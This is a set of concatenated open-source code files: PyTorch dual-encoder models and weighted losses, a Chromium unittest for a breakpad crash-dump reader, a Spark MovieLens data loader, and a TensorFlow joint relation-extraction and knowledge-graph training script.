                 **kwargs):
        """
        :param embeddings: single embedding module, registered under the feature key 'x'
        :param reduction_type: one of '2ha[_mean|_max]', 'sha[_mean|_max]', 'max', 'mean', 'cls'/'zero'
        :param reduction_d_k: per-head dim of the attention-based reductions
        :param freeze_encoders: run embeddings+transformer under `torch.no_grad()`
        :param kwargs: supports `ra_type` passed through to the transformer stack
        """
        # Two-head ("2ha*") reductions concatenate two heads, doubling the reduction output dim
        super().__init__(2*d_model if reduction_type.startswith("2") else d_model, stacking_layers,
                         d_out if d_out is not None else d_model, ffn_pdrop, None, output_layer,
                         output_activation, output_shared)

        reduction_type = reduction_type.lower()
        self.reduce_fn = self._reduce_3
        if reduction_type == "2ha":
            self.reduction_layer = TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k)
        elif reduction_type == "2ha_mean":
            self.reduction_layer = TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="mean")
        elif reduction_type == "2ha_max":
            self.reduction_layer = TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="max")
        elif reduction_type == "sha":
            self.reduction_layer = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k)
        elif reduction_type == "sha_mean":
            self.reduction_layer = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="mean")
        elif reduction_type == "sha_max":
            self.reduction_layer = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="max")
        elif reduction_type == 'max':
            self.reduce_fn = self._reduce_1
            self.reduction_layer = MaxPool1D(self.output_dim)
        elif reduction_type == 'mean':
            self.reduce_fn = self._reduce_1
            self.reduction_layer = MeanPool1D(self.output_dim)
        elif reduction_type == 'cls' or reduction_type == 'zero':
            # First-token reduction needs no layer at all
            self.reduce_fn = self._reduce_0
        else:
            raise Exception("Unknown exception type")
        self.weight_std = weight_std
        ra_type = kwargs.get('ra_type')
        self.transformer = TransformerEncoderStack(num_heads=num_heads, d_model=d_model,
                                                   pdrop=dropout, layers=num_layers, activation='gelu', d_ff=d_ff,
                                                   ffn_pdrop=ffn_pdrop,
                                                   d_k=d_k, rpr_k=rpr_k, windowed_ra=windowed_ra, rpr_value_on=rpr_value_on,
                                                   layer_norms_after=layer_norms_after, layer_norm_eps=layer_norm_eps,
                                                   ra_type=ra_type, transformer_type=transformer_type)

        self.embeddings = EmbeddingsStack({'x': embeddings}, 0.0, False, embeddings_reduction)
        self.freeze = freeze_encoders
        self.apply(self.init_layer_weights)

    def init_layer_weights(self, module):
        # Normal init for linear/embedding/LN weights; zero out biases
        if isinstance(module, (nn.Linear, nn.Embedding, nn.LayerNorm)):
            module.weight.data.normal_(mean=0.0, std=self.weight_std)
        if isinstance(module, (nn.Linear, nn.LayerNorm)) and module.bias is not None:
            module.bias.data.zero_()

    def _reduce_3(self, encoded, att_mask):
        """The attention modules originally created for DE have 3 (redundant) inputs, so use all 3 here
        """
        return self.reduction_layer((encoded, encoded, encoded, att_mask))

    def _reduce_1(self, encoded, att_mask):
        """The standard reduction modules use an input and a length
        """
        lengths = att_mask.squeeze(1).squeeze(1).sum(-1)
        return self.reduction_layer((encoded, lengths))

    def _reduce_0(self, encoded, _):
        """The [CLS] or <s> reduction on the first token just needs the first timestep
        """
        return encoded[:, 0]

    def encode_query_base(self, query):
        # [B, 1, 1, T] mask of non-PAD positions
        query_mask = (query != Offsets.PAD)
        att_mask = query_mask.unsqueeze(1).unsqueeze(1)

        # Optionally freeze the shared encoder; the reduction still trains
        with torch.no_grad() if self.freeze else contextlib.ExitStack():
            embedded = self.embeddings({'x': query})
            encoded_query = self.transformer((embedded, att_mask))

        encoded_query = self.reduce_fn(encoded_query, att_mask)
        return encoded_query

    def encode_response_base(self, response):
        response_mask = (response != Offsets.PAD)
        att_mask = response_mask.unsqueeze(1).unsqueeze(1)

        with torch.no_grad() if self.freeze else contextlib.ExitStack():
            embedded = self.embeddings({'x': response})
            encoded_response = self.transformer((embedded, att_mask))

        encoded_response = self.reduce_fn(encoded_response, att_mask)
        return encoded_response
class TransformerBoWPairedModel(DualEncoderModel):
    """2 Encoders (E1, E2).  E1 is a Transformer followed by attention reduction.  E2 is just a pooling of embeddings
    """

    def __init__(self, embeddings,
                 d_model,
                 d_ff,
                 dropout,
                 num_heads,
                 num_layers,
                 stacking_layers=None,
                 d_out=512,
                 d_k=None,
                 weight_std=0.02,
                 rpr_k=None,
                 reduction_d_k=64,
                 ffn_pdrop=0.1,
                 windowed_ra=False,
                 rpr_value_on=False,
                 reduction_type_1="2ha",
                 freeze_encoders=False,
                 layer_norms_after=False,
                 transformer_type: Optional[str]=None,
                 **kwargs):
        """
        :param embeddings: single embedding module, registered under the feature key 'x'
        :param reduction_type_1: reduction for the transformer side: '2ha[_mean|_max]' or 'sha[_mean|_max]'
        :param freeze_encoders: run embeddings/transformer under `torch.no_grad()`
        :param kwargs: supports `ra_type` passed through to the transformer stack
        """
        super().__init__(d_model, stacking_layers, d_out, ffn_pdrop)

        reduction_type_1 = reduction_type_1.lower()
        # Two-head reductions emit 2*d_model, so project back down to d_model
        if reduction_type_1 == "2ha":
            self.reduction_layer_1 = nn.Sequential(TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k),
                                                   nn.Linear(2*d_model, d_model))
        elif reduction_type_1 == "2ha_mean":
            self.reduction_layer_1 = nn.Sequential(TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="mean"),
                                                   nn.Linear(2 * d_model, d_model))
        elif reduction_type_1 == "2ha_max":
            self.reduction_layer_1 = nn.Sequential(TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="max"),
                                                   nn.Linear(2 * d_model, d_model))
        elif reduction_type_1 == "sha":
            self.reduction_layer_1 = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k)
        elif reduction_type_1 == "sha_mean":
            self.reduction_layer_1 = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="mean")
        elif reduction_type_1 == "sha_max":
            self.reduction_layer_1 = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="max")
        else:
            raise Exception("Unknown exception type")
        self.weight_std = weight_std
        ra_type = kwargs.get('ra_type')
        self.transformer = TransformerEncoderStack(num_heads=num_heads, d_model=d_model,
                                                   pdrop=dropout, layers=num_layers, activation='gelu', d_ff=d_ff,
                                                   ffn_pdrop=ffn_pdrop,
                                                   d_k=d_k, rpr_k=rpr_k, windowed_ra=windowed_ra, rpr_value_on=rpr_value_on,
                                                   layer_norms_after=layer_norms_after, ra_type=ra_type, transformer_type=transformer_type)
        self.embeddings = EmbeddingsStack({'x': embeddings})
        self.freeze = freeze_encoders
        # E2 is a simple pool over raw embeddings, matched to E1's pooling flavor
        self.reduction_layer_2 = MaxPool1D(d_out) if reduction_type_1.endswith('max') else MeanPool1D(d_out)
        self.apply(self.init_layer_weights)

    def init_layer_weights(self, module):
        # Normal init for linear/embedding/LN weights; zero out biases
        if isinstance(module, (nn.Linear, nn.Embedding, nn.LayerNorm)):
            module.weight.data.normal_(mean=0.0, std=self.weight_std)
        if isinstance(module, (nn.Linear, nn.LayerNorm)) and module.bias is not None:
            module.bias.data.zero_()

    def encode_query_base(self, query):
        # [B, 1, 1, T] mask of non-PAD positions
        query_mask = (query != Offsets.PAD)
        att_mask = query_mask.unsqueeze(1).unsqueeze(1)
        # Optionally freeze the encoder; the reduction still trains
        with torch.no_grad() if self.freeze else contextlib.ExitStack():
            embedded = self.embeddings({'x': query})
            encoded_query = self.transformer((embedded, att_mask))
        encoded_query = self.reduction_layer_1((encoded_query, encoded_query, encoded_query, att_mask))
        return encoded_query

    def encode_response_base(self, response):
        # Response side skips the transformer entirely: pool the raw embeddings by length
        response_lengths = torch.sum(response != Offsets.PAD, dim=1)
        with torch.no_grad() if self.freeze else contextlib.ExitStack():
            embedded = self.embeddings({'x': response})
        encoded_response = self.reduction_layer_2((embedded, response_lengths))
        return encoded_response
class CudaTimer:
    """A CUDA timer context manager that can be used to track and record events

    The timer is only enabled if `MEAD_PYTORCH_TIMER` is true.  If its enabled, it
    will cause a large slowdown (similar to `CUDA_LAUNCH_BLOCKING`).
    """

    def __init__(self, name, sync_before=True):
        """
        :param name: label printed alongside the elapsed time
        :param sync_before: synchronize CUDA first so prior queued work is excluded
        """
        self.enabled = str2bool(os.getenv('MEAD_PYTORCH_TIMER', False))
        if not self.enabled:
            return
        self._name = name
        self._start = torch.cuda.Event(enable_timing=True)
        self._end = torch.cuda.Event(enable_timing=True)
        if sync_before:
            torch.cuda.synchronize()

    def __enter__(self):
        if self.enabled:
            self._start.record()

    def __exit__(self, exc_type, exc_value, exc_traceback):
        if not self.enabled:
            return
        self._end.record()
        # Must synchronize before reading elapsed_time, or the end event may not have fired
        torch.cuda.synchronize()
        elapsed = self._start.elapsed_time(self._end)
        print(f"({os.getpid()}) {self._name} {elapsed}")
class WeightedNLLLoss(nn.Module):
    """Weight individual training examples
    """

    def __init__(self):
        super().__init__()
        # Per-example losses so we can apply the per-example weights ourselves
        self.loss = nn.NLLLoss(reduction='none')

    def forward(self, pred, y, weight):
        """Compute per-example NLL, scale each by its weight, and average.

        :param pred: [B, C] log-probabilities
        :param y: [B] gold labels
        :param weight: [B] per-example weights
        :return: scalar weighted-average loss
        """
        per_example = self.loss(pred, y)
        scaled_weight = weight.type_as(per_example)
        return torch.dot(per_example, scaled_weight) / len(scaled_weight)
class WeightedMultiHeadNLLLoss(nn.Module):
    """Per-example weighted NLL summed across multiple prediction heads."""

    def __init__(self):
        super().__init__()
        # Unreduced so per-example losses can be combined across heads.
        self.loss = nn.NLLLoss(reduction='none')

    def forward(self, preds, targets, weights):
        """Weighted-average multi-head NLL.

        :param preds: list of H tensors, each [B, C_h] log-probabilities
        :param targets: [B, H] gold indices, one column per head
        :param weights: [B] per-example weights
        :return: scalar loss
        """
        head_losses = [self.loss(head_pred, targets[:, idx])
                       for idx, head_pred in enumerate(preds)]
        # Sum the heads into a single [B] per-example loss.
        combined = torch.stack(head_losses, dim=0).sum(dim=0)
        scaled = combined * weights.type_as(combined)
        return scaled.mean()
class WeightedSequenceLoss(nn.Module):
    """Sequence loss with a per-sequence sample weight.

    Wraps an unreduced criterion (PAD positions ignored), reduces each
    sequence over time (mean or sum), then averages over the batch using
    caller-supplied sample weights.
    """

    def __init__(self, LossFn: nn.Module = nn.NLLLoss, avg: str = "token"):
        """
        :param LossFn: criterion class; instantiated with ``reduction="none"``
            and ``ignore_index=Offsets.PAD``
        :param avg: ``"token"`` to mean over time steps per sequence,
            anything else to sum over time steps
        """
        super().__init__()
        self.avg = avg
        self.crit = LossFn(ignore_index=Offsets.PAD, reduction="none")
        if avg == 'token':
            self._reduce = self._mean
        else:
            self._reduce = self._sum

    def _mean(self, loss):
        # Mean loss per sequence over the time dimension.
        # Use the torch-native `dim` keyword (`axis` is a NumPy-compat alias).
        return loss.mean(dim=1)

    def _sum(self, loss):
        # Total loss per sequence over the time dimension.
        return loss.sum(dim=1)

    def forward(self, inputs: torch.Tensor, targets: torch.Tensor, weight: torch.Tensor) -> torch.Tensor:
        """Evaluate some loss over a sequence.

        :param inputs: torch.FloatTensor, [B, T, C] The scores from the model. Batch First
        :param targets: torch.LongTensor, [B, T] The labels.
        :param weight: sample weights [B, ]
        :returns: torch.FloatTensor, The loss.
        """
        total_sz = targets.nelement()
        batchsz = weight.shape[0]
        # Flatten to [B*T, C] / [B*T] for the criterion, then fold back to [B, T].
        loss = self.crit(inputs.view(total_sz, -1), targets.view(total_sz)).view(batchsz, -1)  # [B, T]
        # Reduce over time, then take the weighted batch mean.
        loss = torch.dot(self._reduce(loss), weight.type_as(loss)) / batchsz
        return loss

    def extra_repr(self):
        return f"reduction={self.avg}"
|
third_party/blink/tools/blinkpy/web_tests/breakpad/dump_reader_multipart_unittest.py | zipated/src | 2,151 | 9840 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from blinkpy.common.host import Host
from blinkpy.common.host_mock import MockHost
from blinkpy.web_tests.breakpad.dump_reader_multipart import DumpReaderMultipart
class TestDumpReaderMultipart(unittest.TestCase):
    """Tests for DumpReaderMultipart against mock hosts/filesystems."""

    # A minimal breakpad multipart crash report: product name, crashing
    # pid, and an (abbreviated) minidump payload.
    _MULTIPART_DUMP = [
        '--boundary',
        'Content-Disposition: form-data; name="prod"',
        '',
        'content_shell',
        '--boundary',
        'Content-Disposition: form-data; name="pid"',
        '',
        '4711',
        '--boundary',
        'Content-Disposition: form-data; name="upload_file_minidump"; filename="dump"',
        'Content-Type: application/octet-stream',
        '',
        'MDMP',
        '--boundary--',
    ]

    def _make_dump_reader(self, host, build_dir):
        """Return a DumpReaderMultipart wired for content_shell 'dmp' dumps."""
        dump_reader = DumpReaderMultipart(host, build_dir)
        dump_reader._file_extension = lambda: 'dmp'
        dump_reader._binaries_to_symbolize = lambda: ['content_shell']
        return dump_reader

    def _make_host_with_dump(self, dump_file):
        """Return a MockHost whose filesystem holds the multipart dump."""
        host = MockHost()
        host.filesystem.write_text_file(dump_file, "\r\n".join(TestDumpReaderMultipart._MULTIPART_DUMP))
        host.filesystem.maybe_make_directory("/mock-checkout/out/Debug")
        host.filesystem.exists = lambda x: True
        # The mock file object returned by open_binary_file_for_reading doesn't
        # have readline(), however, the real File object does.
        host.filesystem.open_binary_file_for_reading = host.filesystem.open_text_file_for_reading
        return host

    def test_check_generate_breakpad_symbols_actually_exists(self):
        host = Host()
        dump_reader = DumpReaderMultipart(host, build_dir=None)
        self.assertTrue(host.filesystem.exists(dump_reader._path_to_generate_breakpad_symbols()))

    def test_check_is_functional_breakpad_tools_not_found(self):
        host = MockHost()
        build_dir = "/mock-checkout/out/Debug"
        host.filesystem.maybe_make_directory(build_dir)
        dump_reader = self._make_dump_reader(host, build_dir)
        self.assertFalse(dump_reader.check_is_functional())

    def test_get_pid_from_dump(self):
        dump_file = '/crash-dumps/dump.dmp'
        expected_pid = '4711'
        host = self._make_host_with_dump(dump_file)
        dump_reader = self._make_dump_reader(host, "/mock-checkout/out/Debug")
        self.assertTrue(dump_reader.check_is_functional())
        self.assertEqual(expected_pid, dump_reader._get_pid_from_dump(dump_file))

    def test_get_stack_from_dump(self):
        dump_file = '/crash-dumps/dump.dmp'
        host = self._make_host_with_dump(dump_file)
        dump_reader = self._make_dump_reader(host, "/mock-checkout/out/Debug")
        self.assertTrue(dump_reader.check_is_functional())
        self.assertEqual("MOCK output of child process", dump_reader._get_stack_from_dump(dump_file))
        # One subprocess call to generate symbols, one to walk the minidump.
        self.assertEqual(2, len(host.executive.calls))
        cmd_line = " ".join(host.executive.calls[0])
        self.assertIn('generate_breakpad_symbols.py', cmd_line)
        cmd_line = " ".join(host.executive.calls[1])
        self.assertIn('minidump_stackwalk', cmd_line)
|
Chapter04/python/2.0.0/com/sparksamples/util.py | quguiliang/Machine-Learning-with-Spark-Second-Edition | 112 | 9848 | <gh_stars>100-1000
import os
import sys
from pyspark.sql.types import *
# Root of the MovieLens data files and the local Spark 2.0.0 installation.
PATH = "/home/ubuntu/work/ml-resources/spark-ml/data"
SPARK_HOME = "/home/ubuntu/work/spark-2.0.0-bin-hadoop2.7/"
os.environ['SPARK_HOME'] = SPARK_HOME
# Make the bundled PySpark package importable before the pyspark imports below.
sys.path.append(SPARK_HOME + "/python")
from pyspark import SparkContext
from pyspark import SparkConf
from pyspark.sql import SparkSession
# Module-level Spark handles shared by every helper in this module
# (created once, as a side effect of importing the module).
conf = SparkConf().setAppName("First Spark App").setMaster("local")
sc = SparkContext(conf=conf)
spark = SparkSession(sc)
def get_user_data():
    """Load the MovieLens 100k user table (u.user) as a Spark DataFrame.

    The file is '|' delimited with columns: user id, age, gender,
    occupation, zip code.

    :return: DataFrame with the explicit schema below
    """
    custom_schema = StructType([
        StructField("no", StringType(), True),
        StructField("age", IntegerType(), True),
        StructField("gender", StringType(), True),
        StructField("occupation", StringType(), True),
        StructField("zipCode", StringType(), True)
    ])
    # SQLContext imported locally to keep the module import section minimal.
    # (The redundant local `from pyspark.sql.types import *` was removed: it
    # ran *after* the schema was built and duplicated the top-level import.)
    from pyspark.sql import SQLContext
    sql_context = SQLContext(sc)
    user_df = sql_context.read \
        .format('com.databricks.spark.csv') \
        .options(header='false', delimiter='|') \
        .load("%s/ml-100k/u.user" % PATH, schema=custom_schema)
    return user_df
def get_movie_data_df():
    """Load the MovieLens 100k movie table (u.item) as a Spark DataFrame.

    The file is '|' delimited: id, title, release date, a blank column,
    IMDb URL, then 19 binary genre-flag columns (f2..f19 plus f1).

    :return: DataFrame with the explicit schema below
    """
    custom_schema = StructType([
        StructField("no", StringType(), True),
        StructField("moviename", StringType(), True),
        StructField("date", StringType(), True),
        StructField("f1", StringType(), True), StructField("url", StringType(), True),
        StructField("f2", IntegerType(), True), StructField("f3", IntegerType(), True),
        StructField("f4", IntegerType(), True), StructField("f5", IntegerType(), True),
        StructField("f6", IntegerType(), True), StructField("f7", IntegerType(), True),
        StructField("f8", IntegerType(), True), StructField("f9", IntegerType(), True),
        StructField("f10", IntegerType(), True), StructField("f11", IntegerType(), True),
        StructField("f12", IntegerType(), True), StructField("f13", IntegerType(), True),
        StructField("f14", IntegerType(), True), StructField("f15", IntegerType(), True),
        StructField("f16", IntegerType(), True), StructField("f17", IntegerType(), True),
        StructField("f18", IntegerType(), True), StructField("f19", IntegerType(), True)
    ])
    # SQLContext imported locally to keep the module import section minimal.
    # (The redundant local `from pyspark.sql.types import *` was removed: it
    # ran *after* the schema was built and duplicated the top-level import.)
    from pyspark.sql import SQLContext
    sql_context = SQLContext(sc)
    movie_df = sql_context.read \
        .format('com.databricks.spark.csv') \
        .options(header='false', delimiter='|') \
        .load("%s/ml-100k/u.item" % PATH, schema=custom_schema)
    return movie_df
def get_movie_data():
    """Return the raw MovieLens movie file (u.item) as an RDD of lines."""
    return sc.textFile("%s/ml-100k/u.item" % PATH)
def get_rating_data():
    """Return the raw MovieLens ratings file (u.data) as an RDD of lines."""
    return sc.textFile("%s/ml-100k/u.data" % PATH)
|
original/baselines/train/JointE+ONE.py | thunlp/JointNRE | 186 | 9882 | #coding:utf-8
import numpy as np
import tensorflow as tf
import os
import time
import datetime
import ctypes
import threading
import json
# Native helpers compiled from the project's C sources:
# init_cnn.so feeds sentence batches for the CNN encoder and
# init_know.so samples triples for the TransE-style KG objective.
ll1 = ctypes.cdll.LoadLibrary
lib_cnn = ll1("./init_cnn.so")
ll2 = ctypes.cdll.LoadLibrary
lib_kg = ll2("./init_know.so")
class Config(object):
	"""Hyper-parameters for the joint text/KG model.

	Corpus-dependent sizes are pulled from the native batching library so
	they always match the preprocessed data files on disk.
	"""
	def __init__(self):
		# Sizes reported by the CNN-side C library.
		self.instanceTot = lib_cnn.getInstanceTot()
		self.sequence_size = lib_cnn.getLenLimit()
		self.num_classes = lib_cnn.getRelationTotal()
		self.num_words = lib_cnn.getWordTotal()
		self.num_positions = 2 * lib_cnn.getPositionLimit() + 1
		self.word_size = lib_cnn.getWordDimension()
		# Each token is a word vector concatenated with two position vectors.
		self.position_size = 5
		self.embedding_size = self.word_size + self.position_size * 2
		self.filter_size = 3
		self.num_filters = 230
		self.relation_size = self.word_size#230
		self.dropout_keep_prob = 0.5
		self.l2_lambda = 0.0001
		# Index of the NA ("no relation") class; forwarded to the C sampler.
		self.NA = 51
		lib_cnn.setNA(self.NA)
		lib_cnn.setRate(3)
		# TransE margin plus batching / training schedule.
		self.margin = 1.0
		self.nbatches = 100
		self.trainTimes = 15
		# Filled in from lib_kg in __main__ before the graph is built.
		self.entityTotal = 0
		self.relationTotal = 0
class Model(object):
	"""Joint model: a CNN sentence encoder for relation classification plus
	a TransE-style knowledge-graph margin loss sharing the word embeddings.

	Written against the TF 0.x API (positional ``tf.concat(axis, ...)``,
	positional ``softmax_cross_entropy_with_logits(logits, labels)``).
	"""
	def __init__(self, config):
		# Unpack hyper-parameters for readability below.
		sequence_size = config.sequence_size
		num_classes = config.num_classes
		num_words = config.num_words
		num_positions = config.num_positions
		embedding_size = config.embedding_size
		word_size = config.word_size
		position_size = config.position_size
		relation_size = config.relation_size
		filter_size = config.filter_size
		num_filters = config.num_filters
		dropout_keep_prob = config.dropout_keep_prob
		margin = config.margin
		l2_lambda = config.l2_lambda
		# CNN-side placeholders: token ids, head/tail position features,
		# the bag's relation id / label, and the entity-pair ids.
		self.input_x = tf.placeholder(tf.int32, [None, sequence_size], name = "input_x")
		self.input_p_h = tf.placeholder(tf.int32, [None, sequence_size], name = "input_p_h")
		self.input_p_t = tf.placeholder(tf.int32, [None, sequence_size], name = "input_p_t")
		self.input_r = tf.placeholder(tf.float32, [1, 1], name = "input_r")
		self.input_r_n = tf.placeholder(tf.float32, [1, 1], name = "input_r_n")
		self.input_h = tf.placeholder(tf.int32, [1, 1], name = "input_h")
		self.input_t = tf.placeholder(tf.int32, [1, 1], name = "input_t")
		self.input_y = tf.placeholder(tf.float32, [1, num_classes], name = "input_y")
		# KG-side placeholders: positive and corrupted (negative) triples.
		self.pos_h = tf.placeholder(tf.int32, [None])
		self.pos_t = tf.placeholder(tf.int32, [None])
		self.pos_r = tf.placeholder(tf.int32, [None])
		self.neg_h = tf.placeholder(tf.int32, [None])
		self.neg_t = tf.placeholder(tf.int32, [None])
		self.neg_r = tf.placeholder(tf.int32, [None])
		l2_loss = tf.constant(0.0)
		with tf.name_scope("embedding-lookup"):
			# `word_embeddings` here is the module-level numpy array filled
			# from the C library in __main__ (pretrained vectors).
			self.word_embeddings = tf.Variable(word_embeddings, name="word_embeddings")
			self.relation_embeddings = tf.get_variable("relation_embeddings", [config.relationTotal, word_size])
			self.position_embeddings = tf.get_variable("position_embeddings", [num_positions, position_size])
			self.relation_attention = tf.get_variable("relation_attention", [num_classes, relation_size])
			self.NAattention = tf.get_variable("NAattention", [relation_size, 1])
			self.attention = tf.get_variable("attention", [num_filters, relation_size])
			#know
			# Entity embeddings are shared with the word embedding table.
			pos_h_e = tf.nn.embedding_lookup(self.word_embeddings, self.pos_h)
			pos_t_e = tf.nn.embedding_lookup(self.word_embeddings, self.pos_t)
			pos_r_e = tf.nn.embedding_lookup(self.relation_embeddings, self.pos_r)
			neg_h_e = tf.nn.embedding_lookup(self.word_embeddings, self.neg_h)
			neg_t_e = tf.nn.embedding_lookup(self.word_embeddings, self.neg_t)
			neg_r_e = tf.nn.embedding_lookup(self.relation_embeddings, self.neg_r)
			#cnn
			# Token representation = word vector ++ head-position ++ tail-position,
			# expanded to NHWC for conv2d. (TF 0.x concat: axis comes first.)
			self.x_initial = tf.nn.embedding_lookup(self.word_embeddings, self.input_x)
			self.x_p_h = tf.nn.embedding_lookup(self.position_embeddings, self.input_p_h)
			self.x_p_t = tf.nn.embedding_lookup(self.position_embeddings, self.input_p_t)
			self.x = tf.expand_dims(tf.concat(2, [self.x_initial, self.x_p_h, self.x_p_t]), -1)
			self.head = tf.nn.embedding_lookup(self.word_embeddings, self.input_h)
			self.tail = tf.nn.embedding_lookup(self.word_embeddings, self.input_t)
			l2_loss += tf.nn.l2_loss(self.attention)
		with tf.name_scope("conv-maxpool"):
			# Single convolution over full token width, tanh, then max-pool
			# over time -> one num_filters-dim vector per sentence.
			self.W = tf.get_variable("W", [filter_size, embedding_size, 1, num_filters])
			self.b = tf.get_variable("b", [num_filters])
			conv = tf.nn.conv2d(self.x, self.W, strides=[1, 1, 1, 1], padding="VALID", name="conv")
			h = tf.nn.tanh(tf.nn.bias_add(conv, self.b), name="tanh")
			self.y = tf.nn.max_pool(h, ksize=[1, sequence_size - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name="pool")
			l2_loss += tf.nn.l2_loss(self.W)
			l2_loss += tf.nn.l2_loss(self.b)
		self.y = tf.reshape(self.y, [-1, num_filters])
		with tf.name_scope('attention'):
			# "ONE" bag aggregation: element-wise max over the bag's sentences.
			self.y_attention = tf.reduce_max(self.y, 0 , keep_dims = True)
		with tf.name_scope("dropout"):
			self.y_attention = tf.nn.l2_normalize(self.y_attention, 1)
			self.h_drop = tf.nn.dropout(self.y_attention, dropout_keep_prob)
			# Final projection to relation scores.
			self.transfer_w = tf.get_variable("transfer_w", [num_filters, num_classes])
			self.scores = tf.matmul(self.h_drop, self.transfer_w)
			l2_loss += tf.nn.l2_loss(self.transfer_w)
		with tf.name_scope("loss"):
			# CNN loss: softmax cross-entropy + L2 regularization.
			cross_entropy = tf.nn.softmax_cross_entropy_with_logits(self.scores, self.input_y)
			self.loss_cnn = tf.reduce_mean(cross_entropy) + l2_lambda * l2_loss
			# KG loss: TransE margin ranking with L1 distance h + r - t.
			pos = tf.reduce_sum(abs(pos_h_e + pos_r_e - pos_t_e), 1, keep_dims = True)
			neg = tf.reduce_sum(abs(neg_h_e + neg_r_e - neg_t_e), 1, keep_dims = True)
			self.loss_kg = tf.reduce_sum(tf.maximum(pos - neg + margin, 0))
		with tf.name_scope("accuracy"):
			self.predictions = tf.argmax(self.scores, 1, name="predictions")
			correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))
			self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")
# Running statistics shared (via `global`) with the CNN training thread.
bags_sum = 0.0
bags_hit_NA = 0.0
sum_NA = 0.0
sum_fNA = 0.0
bags_hit = 0.0
loss_sum = 0.0
if __name__ == "__main__":
	# Load the preprocessed data on the C side and fix the RNG seeds.
	lib_cnn.readWordVec()
	lib_cnn.readFromFile()
	lib_kg.init()
	np.random.seed(0)
	tf.set_random_seed(0)
	config = Config()
	# Copy the pretrained word vectors out of the C library by raw pointer.
	word_embeddings = np.zeros(config.num_words * config.word_size, dtype = np.float32)
	lib_cnn.getWordVec.argtypes = [ctypes.c_void_p]
	lib_cnn.getWordVec(word_embeddings.__array_interface__['data'][0])
	word_embeddings.resize((config.num_words,config.word_size))
	# NOTE: this file targets Python 2, so `/` here is integer division.
	config.batch_size = lib_kg.getTripleTotal() / config.nbatches
	config.entityTotal = lib_kg.getEntityTotal()
	config.relationTotal = lib_kg.getRelationTotal()
	with tf.Graph().as_default():
		conf = tf.ConfigProto()
		sess = tf.Session(config=conf)
		with sess.as_default():
			initializer = tf.contrib.layers.xavier_initializer()
			with tf.variable_scope("model", reuse=None, initializer = initializer):
				m = Model(config = config)
			# Separate optimizers and global steps for the two objectives,
			# trained concurrently by the two threads below.
			global_step_cnn = tf.Variable(0, name="global_step_cnn", trainable=False)
			optimizer_cnn = tf.train.GradientDescentOptimizer(0.01)
			grads_and_vars_cnn = optimizer_cnn.compute_gradients(m.loss_cnn)
			train_op_cnn = optimizer_cnn.apply_gradients(grads_and_vars_cnn, global_step = global_step_cnn)
			global_step_kg = tf.Variable(0, name="global_step_kg", trainable=False)
			optimizer_kg = tf.train.GradientDescentOptimizer(0.001)
			grads_and_vars_kg = optimizer_kg.compute_gradients(m.loss_kg)
			train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step=global_step_kg)
			sess.run(tf.initialize_all_variables())
			def outEmbedding(str1):
				# Dump the current parameters to log<str1>.txt, one JSON
				# array per line.
				# NOTE(review): m.transfer_b, m.softmax_w and m.softmax_b are
				# never defined on Model, so this sess.run should raise
				# AttributeError at runtime -- they look like leftovers from
				# an older Model version; verify before running.
				word_embeddings, relation_embeddings, position_embeddings, relation_attention, attention, W, B, transfer_w, transfer_b, softmax_w, softmax_b = sess.run([m.word_embeddings, m.relation_embeddings, m.position_embeddings, m.relation_attention, m.attention, m.W, m.b, m.transfer_w, m.transfer_b, m.softmax_w, m.softmax_b])
				log = open("log"+str1+".txt", "w")
				log.write(json.dumps(word_embeddings.tolist())+"\n")
				log.write(json.dumps(relation_embeddings.tolist())+"\n")
				log.write(json.dumps(position_embeddings.tolist())+"\n")
				log.write(json.dumps(relation_attention.tolist())+"\n")
				log.write(json.dumps(attention.tolist())+"\n")
				log.write(json.dumps(W.tolist())+"\n")
				log.write(json.dumps(B.tolist())+"\n")
				log.write(json.dumps(transfer_w.tolist())+"\n")
				NAattention = sess.run(m.NAattention)
				log.write(json.dumps(NAattention.tolist()) + "\n")
				log.close()
			# Reusable numpy buffers that the C library fills in place
			# (passed below as raw data pointers).
